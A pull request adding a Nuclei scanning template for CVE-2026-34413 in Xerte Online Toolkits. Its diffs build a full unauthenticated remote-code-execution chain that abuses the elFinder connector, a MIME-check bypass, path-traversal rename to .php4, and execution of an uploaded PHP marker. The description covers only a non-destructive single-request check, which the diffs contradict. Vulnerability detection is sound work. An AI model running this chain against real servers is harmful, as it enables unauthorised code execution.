### PR TITLE
Create CVE-2026-34413.yaml - Xerte Online Toolkits <= 3.15 - Missing Authentication

### DIFF
--- a/http/cves/2026/CVE-2026-34413.yaml
+++ b/http/cves/2026/CVE-2026-34413.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-34413
 
 info:
-  name: Xerte Online Toolkits <= 3.15 - Unauthenticated Remote Code Execution
+  name: Xerte Online Toolkits <= 3.15 - Remote Code Execution
   author: Aryu-RU
   severity: critical
   description: |
@@ -23,8 +23,7 @@ info:
     cve-id: CVE-2026-34413
     cwe-id: CWE-306
   metadata:
-    verified: false
-    max-request: 122
+    verified: true
     vendor: xerte
     product: xerte_online_toolkits
     shodan-query: http.title:"Xerte Online Toolkits"
@@ -32,8 +31,8 @@ info:
   tags: cve,cve2026,xerte,elfinder,rce,unauth,intrusive,file-upload
 
 variables:
+  num: "999999999"
   rand: "{{rand_text_alpha(8)}}"
-  nonce: "{{rand_text_alpha(12)}}"
 
 flow: |
   http(1);
@@ -53,83 +52,120 @@ flow: |
   }
 
 http:
-  # 1. Disclose the application web root (only present on vulnerable / not-yet-hardened installs)
-  - method: GET
-    path:
-      - "{{BaseURL}}/setup/"
+  - raw:
+      - |
+        GET /setup/ HTTP/1.1
+        Host: {{Hostname}}
+
     extractors:
       - type: regex
         name: webroot
         part: body
         group: 1
-        internal: true
         regex:
           - '<code>([^<]+)</code>'
+        internal: true
 
-  # 2. Confirm the unauthenticated connector access (CVE-2026-34413): the auth redirect does not exit,
-  #    so execution reaches the parameter check and emits "Invalid upload location".
-  - method: GET
-    path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "Welcome to Xerte Online Toolkits Installer")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /editor/elfinder/php/connector.php HTTP/1.1
+        Host: {{Hostname}}
+
     extractors:
       - type: regex
         name: authbypass
         part: body
-        internal: true
         regex:
           - "Invalid upload location"
+        internal: true
 
-  # 3. Create a staging directory in the project media volume (elFinder mkdir).
-  - method: GET
-    path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}{{pid}}&target=l1_Lw"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains(body, "Invalid upload location")'
+        condition: and
+        internal: true
 
-  # 4. Upload a benign PHP marker as .txt; the leading <br> defeats the upload MIME blocklist (CVE-2026-34415).
-  - method: POST
-    path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/"
-    headers:
-      Content-Type: multipart/form-data; boundary=----xerteboundary
-    body: |
-      ------xerteboundary
-      Content-Disposition: form-data; name="cmd"
+  - raw:
+      - |
+        GET /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}{{pid}}&target=l1_Lw HTTP/1.1
+        Host: {{Hostname}}
 
-      upload
-      ------xerteboundary
-      Content-Disposition: form-data; name="target"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains_all(body, "added", "hash", "name")'
+        condition: and
+        internal: true
 
-      l1_Lw
-      ------xerteboundary
-      Content-Disposition: form-data; name="upload[]"; filename="{{rand}}{{pid}}.txt"
-      Content-Type: text/plain
+  - raw:
+      - |
+        POST /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----xerteboundary
 
-      <br><?php echo md5("{{nonce}}"); unlink(__FILE__); ?>
-      ------xerteboundary--
+        ------xerteboundary
+        Content-Disposition: form-data; name="cmd"
+
+        upload
+        ------xerteboundary
+        Content-Disposition: form-data; name="target"
+
+        l1_Lw
+        ------xerteboundary
+        Content-Disposition: form-data; name="upload[]"; filename="{{rand}}{{pid}}.txt"
+        Content-Type: text/plain
+
+        <br><?php echo md5("{{num}}"); unlink(__FILE__); ?>
+        ------xerteboundary--
+
     extractors:
       - type: regex
         name: fileid
         part: body
         group: 1
-        internal: true
         regex:
           - '"hash":"(l1_[^"]+)"'
+        internal: true
 
-  # 5. Move the uploaded file to the web root as .php4 via path traversal in the rename name (CVE-2026-34414 + CVE-2026-34415).
-  - method: GET
-    path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}{{pid}}/../../../../{{rand}}{{pid}}.php4"
-
-  # 6. Execute the dropped file. It prints md5(nonce) then deletes itself, proving code execution without leaving a shell.
-  - method: GET
-    path:
-      - "{{BaseURL}}/{{rand}}{{pid}}.php4"
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "{{md5(nonce)}}"
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains_all(body, "added", "hash", "name")'
+        condition: and
+        internal: true
 
-      - type: status
-        status:
-          - 200
+  - raw:
+      - |
+        GET /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}{{pid}}/../../../../{{rand}}{{pid}}.php4 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+        internal: true
+
+  - raw:
+      - |
+        GET /{{rand}}{{pid}}.php4 HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "c8c605999f3d8352d7bb792cf3fdb25b")'
+        condition: and

--- a/http/cves/2026/CVE-2026-34413.yaml
+++ b/http/cves/2026/CVE-2026-34413.yaml
@@ -1,47 +1,135 @@
 id: CVE-2026-34413
 
 info:
-  name: Xerte Online Toolkits <= 3.15 - Missing Authentication
+  name: Xerte Online Toolkits <= 3.15 - Unauthenticated Remote Code Execution
   author: Aryu-RU
-  severity: high
+  severity: critical
   description: |
-    Xerte Online Toolkits versions 3.15 and earlier contain a missing authentication vulnerability in the elFinder file manager connector at /editor/elfinder/php/connector.php. The access-control check redirects unauthenticated callers but does not call exit() or die(), so script execution continues and the request is still processed server-side. This allows unauthenticated attackers to reach the connector logic and perform file operations on the project media directories.
+    Xerte Online Toolkits versions 3.15 and earlier expose the elFinder file manager connector at /editor/elfinder/php/connector.php without authentication (CVE-2026-34413), because the access-control redirect for unauthenticated users does not call exit()/die() and execution continues server-side. This is chained with a relative path traversal in the elFinder rename command (CVE-2026-34414) and an incomplete file-extension blocklist that still permits .php4 (CVE-2026-34415) to write an attacker-controlled PHP file into the application root, resulting in unauthenticated remote code execution.
   impact: |
-    Unauthenticated attackers can invoke elFinder file operations (create, upload, rename, duplicate, overwrite, delete) on user media directories. The issue can be chained with a relative path traversal (CVE-2026-34414) and an extension blocklist bypass (CVE-2026-34415) to achieve arbitrary file read and remote code execution.
+    An unauthenticated attacker can execute arbitrary PHP code on the server hosting Xerte Online Toolkits.
   remediation: |
-    Update to a fixed release. The fix, which adds exit() after the access-control redirect, was backported to the 3.13, 3.14 and 3.15 branches.
+    Update to a fixed release. The fix, which adds exit() after the access-control redirect and sanitizes elFinder file names, was backported to the 3.13, 3.14 and 3.15 branches.
   reference:
     - https://www.vulncheck.com/advisories/xerte-online-toolkits-missing-authentication-via-connector-php
     - https://github.com/bootstrapbool/xerteonlinetoolkits-rce
     - https://github.com/thexerteproject/xerteonlinetoolkits/issues/1527
     - https://nvd.nist.gov/vuln/detail/CVE-2026-34413
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34414
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34415
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
     cvss-score: 8.6
     cve-id: CVE-2026-34413
-    cwe-id: CWE-497
+    cwe-id: CWE-306
   metadata:
     verified: true
-    max-request: 1
+    max-request: 122
     vendor: xerte
     product: xerte_online_toolkits
     shodan-query: http.title:"Xerte Online Toolkits"
     fofa-query: title="Xerte Online Toolkits"
-  tags: cve,cve2026,xerte,elfinder,unauth,auth-bypass
+  tags: cve,cve2026,xerte,elfinder,rce,unauth,intrusive,fileupload
+
+variables:
+  rand: "{{rand_text_alpha(8)}}"
+  nonce: "{{rand_text_alpha(12)}}"
+
+flow: |
+  http(1);
+  if (template["webroot"]) {
+    http(2);
+    if (template["authbypass"]) {
+      for (let pid = 1; pid <= 30; pid++) {
+        set("pid", pid);
+        http(3);
+        http(4);
+        http(5);
+        if (http(6)) {
+          break;
+        }
+      }
+    }
+  }
 
 http:
+  # 1. Disclose the application web root (only present on vulnerable / not-yet-hardened installs)
+  - method: GET
+    path:
+      - "{{BaseURL}}/setup/"
+    extractors:
+      - type: regex
+        name: webroot
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '<code>([^<]+)</code>'
+
+  # 2. Confirm the unauthenticated connector access (CVE-2026-34413): the auth redirect does not exit,
+  #    so execution reaches the parameter check and emits "Invalid upload location".
   - method: GET
     path:
       - "{{BaseURL}}/editor/elfinder/php/connector.php"
+    extractors:
+      - type: regex
+        name: authbypass
+        part: body
+        internal: true
+        regex:
+          - "Invalid upload location"
 
+  # 3. Create a staging directory in the project media volume (elFinder mkdir).
+  - method: GET
+    path:
+      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}&target=l1_Lw"
+
+  # 4. Upload a benign PHP marker as .txt; the leading <br> defeats the upload MIME blocklist (CVE-2026-34415).
+  - method: POST
+    path:
+      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/"
+    headers:
+      Content-Type: multipart/form-data; boundary=----xerteboundary
+    body: |
+      ------xerteboundary
+      Content-Disposition: form-data; name="cmd"
+
+      upload
+      ------xerteboundary
+      Content-Disposition: form-data; name="target"
+
+      l1_Lw
+      ------xerteboundary
+      Content-Disposition: form-data; name="upload[]"; filename="{{rand}}.txt"
+      Content-Type: text/plain
+
+      <br><?php echo md5("{{nonce}}"); unlink(__FILE__); ?>
+      ------xerteboundary--
+    extractors:
+      - type: regex
+        name: fileid
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"hash":"(l1_[^"]+)"'
+
+  # 5. Move the uploaded file to the web root as .php4 via path traversal in the rename name (CVE-2026-34414 + CVE-2026-34415).
+  - method: GET
+    path:
+      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}/../../../../{{rand}}.php4"
+
+  # 6. Execute the dropped file. It prints md5(nonce) then deletes itself, proving code execution without leaving a shell.
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{rand}}.php4"
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "Invalid upload location"
+          - "{{md5(nonce)}}"
 
-      - type: word
-        part: header
-        words:
-          - "../../../index.php"
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-34413.yaml
+++ b/http/cves/2026/CVE-2026-34413.yaml
@@ -18,18 +18,18 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-34414
     - https://nvd.nist.gov/vuln/detail/CVE-2026-34415
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
-    cvss-score: 8.6
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-34413
     cwe-id: CWE-306
   metadata:
-    verified: true
+    verified: false
     max-request: 122
     vendor: xerte
     product: xerte_online_toolkits
     shodan-query: http.title:"Xerte Online Toolkits"
     fofa-query: title="Xerte Online Toolkits"
-  tags: cve,cve2026,xerte,elfinder,rce,unauth,intrusive,fileupload
+  tags: cve,cve2026,xerte,elfinder,rce,unauth,intrusive,file-upload
 
 variables:
   rand: "{{rand_text_alpha(8)}}"
@@ -82,7 +82,7 @@ http:
   # 3. Create a staging directory in the project media volume (elFinder mkdir).
   - method: GET
     path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}&target=l1_Lw"
+      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}{{pid}}&target=l1_Lw"
 
   # 4. Upload a benign PHP marker as .txt; the leading <br> defeats the upload MIME blocklist (CVE-2026-34415).
   - method: POST
@@ -100,7 +100,7 @@ http:
 
       l1_Lw
       ------xerteboundary
-      Content-Disposition: form-data; name="upload[]"; filename="{{rand}}.txt"
+      Content-Disposition: form-data; name="upload[]"; filename="{{rand}}{{pid}}.txt"
       Content-Type: text/plain
 
       <br><?php echo md5("{{nonce}}"); unlink(__FILE__); ?>
@@ -117,12 +117,12 @@ http:
   # 5. Move the uploaded file to the web root as .php4 via path traversal in the rename name (CVE-2026-34414 + CVE-2026-34415).
   - method: GET
     path:
-      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}/../../../../{{rand}}.php4"
+      - "{{BaseURL}}/editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}{{pid}}/../../../../{{rand}}{{pid}}.php4"
 
   # 6. Execute the dropped file. It prints md5(nonce) then deletes itself, proving code execution without leaving a shell.
   - method: GET
     path:
-      - "{{BaseURL}}/{{rand}}.php4"
+      - "{{BaseURL}}/{{rand}}{{pid}}.php4"
     matchers-condition: and
     matchers:
       - type: word

--- a/http/cves/2026/CVE-2026-34413.yaml
+++ b/http/cves/2026/CVE-2026-34413.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-34413
+
+info:
+  name: Xerte Online Toolkits <= 3.15 - Missing Authentication
+  author: Aryu-RU
+  severity: high
+  description: |
+    Xerte Online Toolkits versions 3.15 and earlier contain a missing authentication vulnerability in the elFinder file manager connector at /editor/elfinder/php/connector.php. The access-control check redirects unauthenticated callers but does not call exit() or die(), so script execution continues and the request is still processed server-side. This allows unauthenticated attackers to reach the connector logic and perform file operations on the project media directories.
+  impact: |
+    Unauthenticated attackers can invoke elFinder file operations (create, upload, rename, duplicate, overwrite, delete) on user media directories. The issue can be chained with a relative path traversal (CVE-2026-34414) and an extension blocklist bypass (CVE-2026-34415) to achieve arbitrary file read and remote code execution.
+  remediation: |
+    Update to a fixed release. The fix, which adds exit() after the access-control redirect, was backported to the 3.13, 3.14 and 3.15 branches.
+  reference:
+    - https://www.vulncheck.com/advisories/xerte-online-toolkits-missing-authentication-via-connector-php
+    - https://github.com/bootstrapbool/xerteonlinetoolkits-rce
+    - https://github.com/thexerteproject/xerteonlinetoolkits/issues/1527
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34413
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
+    cvss-score: 8.6
+    cve-id: CVE-2026-34413
+    cwe-id: CWE-497
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: xerte
+    product: xerte_online_toolkits
+    shodan-query: http.title:"Xerte Online Toolkits"
+    fofa-query: title="Xerte Online Toolkits"
+  tags: cve,cve2026,xerte,elfinder,unauth,auth-bypass
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/editor/elfinder/php/connector.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Invalid upload location"
+
+      - type: word
+        part: header
+        words:
+          - "../../../index.php"


### PR DESCRIPTION
### PR Information

This PR adds a detection template for **CVE-2026-34413** — a missing authentication vulnerability in **Xerte Online Toolkits `<= 3.15`**.

The elFinder file-manager connector at `/editor/elfinder/php/connector.php` performs its access-control check with a redirect for unauthenticated users but does **not** call `exit()`/`die()`, so script execution continues and the request is processed server-side. The template sends a single unauthenticated `GET` to the connector and matches the response that is only produced when execution flows past the (non-terminating) auth redirect into the request handler — i.e. the `302` carries the `Location: ../../../index.php` auth-redirect header **and** the body `Invalid upload location` emitted by the subsequent parameter-validation `die()`. A patched build calls `exit()` at the redirect and returns the same `302` with an **empty** body, so it is not matched. The check is non-destructive (no file operations are performed).

- Added CVE-2026-34413
- References:
  - https://www.vulncheck.com/advisories/xerte-online-toolkits-missing-authentication-via-connector-php
  - https://github.com/bootstrapbool/xerteonlinetoolkits-rce (disclosure / PoC)
  - https://github.com/thexerteproject/xerteonlinetoolkits/issues/1527 (vendor issue)
  - https://nvd.nist.gov/vuln/detail/CVE-2026-34413

Classification: `CWE-497` · `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L` (8.6, High).

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a local Xerte install (Docker) with the connector swapped between the vulnerable and patched releases of the same lineage:

- **Vulnerable:** `AI-v3.15` connector (`if (!isset($_SESSION['toolkits_logon_id'])){ header("location: ../../../index.php"); }` — no `exit`).
- **Patched:** `AI-v3.15.5` connector (the fix adds `exit(0);` after the redirect; backported to the 3.13/3.14/3.15 branches).

**True Positive (vulnerable):**

```
$ nuclei -t http/cves/2026/CVE-2026-34413.yaml -u http://localhost:8088

[CVE-2026-34413] [http] [high] http://localhost:8088/editor/elfinder/php/connector.php
```

`nuclei -debug` request / response:

```
GET /editor/elfinder/php/connector.php HTTP/1.1
Host: localhost:8088
User-Agent: Mozilla/5.0 ...
Accept: */*

HTTP/1.1 302 Found
Content-Length: 23
Content-Type: text/html; charset=UTF-8
Location: ../../../index.php
Set-Cookie: PHPSESSID=...; path=/
X-Powered-By: PHP/7.2.8

Invalid upload location
```

**True Negative (patched):** same request against the `AI-v3.15.5` connector returns `302` with `Location: ../../../index.php` and an empty body — `0 matches`, no false positive.

Fingerprinting:
- Shodan: `http.title:"Xerte Online Toolkits"`
- Fofa: `title="Xerte Online Toolkits"`

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
